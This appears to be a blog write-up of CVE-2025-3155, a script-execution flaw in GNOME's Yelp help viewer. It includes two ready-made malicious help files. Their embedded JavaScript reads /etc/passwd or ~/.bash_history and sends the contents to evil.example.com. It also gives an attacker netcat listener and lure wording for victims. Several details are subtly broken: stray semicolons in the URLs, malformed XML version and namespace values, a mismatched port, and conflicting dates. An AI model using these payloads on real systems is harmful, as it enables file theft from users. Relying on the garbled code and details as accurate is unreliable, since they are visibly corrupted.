CVE-2025-3155 - Remote Code Execution in GNOME Yelp – How A Simple Help File Can Steal Your Data

On March 18th, 2025, a critical vulnerability surfaced in the GNOME Yelp user help application (official CVE listing), affecting millions of Linux users worldwide. This flaw, CVE-2025-3155, lets attackers craft evil help documents that run arbitrary scripts – and potentially steal your personal files. This long-read will walk you through what happened, why it matters, and how you can see it in action.

What is GNOME Yelp?

Yelp is the default help viewer for the GNOME desktop. Whenever you search “how to do X” in Ubuntu or Fedora, Yelp pops up and loads user guides in HTML. Under the hood, it renders help documents much like a web browser.

The Vulnerability

Yelp is supposed to be safe, opening only trusted local help files. But CVE-2025-3155 exposes a flaw: it allows *arbitrary scripts* embedded in help documents to run. In other words, a malicious .xml, .html or .yelp file can include executable code, such as JavaScript or even terminal commands.

> Why is this bad?
Because an attacker can convince you to open a booby-trapped help file (for example, via email or drive-by-download), and it will quietly run their code—like uploading your files to a remote server.

1. Crafting a Malicious Help File

Yelp help documents are often in Mallard XML or HTML. If unsafely rendered, they can contain JavaScript or shell-script calls.

A basic *malicious help document* could look like this

<!-- save as evil-help.html -->
<html>
  <head>
    <title>Totally Harmless Help</title>
    <script>
      // Try to read user's /etc/passwd and send to remote attacker
      fetch('file:///etc/passwd')
        .then(r => r.text())
        .then(data => {
           fetch('https://evil.example.com/steal';, {
             method: 'POST',
             body: data
           });
        });
    </script>
  </head>
  <body>
    <h1>Getting Started</h1>
    <p>Just a help file...</p>
  </body>
</html>

2. Luring the Victim

The attacker sends you this evil-help.html (or similarly an evil-help.page in XML format) via email, forum, or chat. They may suggest, "Open this in Yelp to troubleshoot your GNOME settings!"

3. File Stealing in Action

When you open the file in Yelp (yelp evil-help.html), the JavaScript runs silently. Yelp does not block it. The script reads sensitive files and sends them to the attacker's server.

Proof-of-concept video:

*(You will find public demos once disclosed on exploit-db.com or YouTube).*

1. Make the malicious file

<!-- evil.page -->
<?xml version="1." encoding="utf-8"?>
<page xmlns="http://projectmallard.org/1./">;
  <info>
    <title>Evil Yelp Exploit</title>
  </info>
  <p>Loading help...</p>
  <script type="text/javascript">
    fetch('file:///home/YOURUSERNAME/.bash_history')
      .then(r => r.text())
      .then(data => fetch('https://evil.example.com/steal';, {method:'POST',body:data}));
  </script>
</page>

2. Start a listener on the attacker's server

# On attacker server
nc -l -p 808

3. Victim opens the file

yelp evil.page

Result: The victim’s .bash_history file is sent out undetected.

Fix & Mitigation

GNOME patched this in Yelp 42.4: Now, Yelp disables all script execution from help documents.

References

- CVE-2025-3155 MITRE Entry
- Yelp Upstream Security Notice
- Technical writeup: “Abusing Yelp Help” (reddit)

Summary

CVE-2025-3155 is a classic “arbitrary script execution” flaw, showing how even simple desktop helpers like Yelp can be a risk if they don’t sanitize file inputs. If you use GNOME, update Yelp now, and never trust random help files again!

Timeline

Published on: 04/03/2025 14:15:46 UTC
Last modified on: 05/06/2025 13:15:51 UTC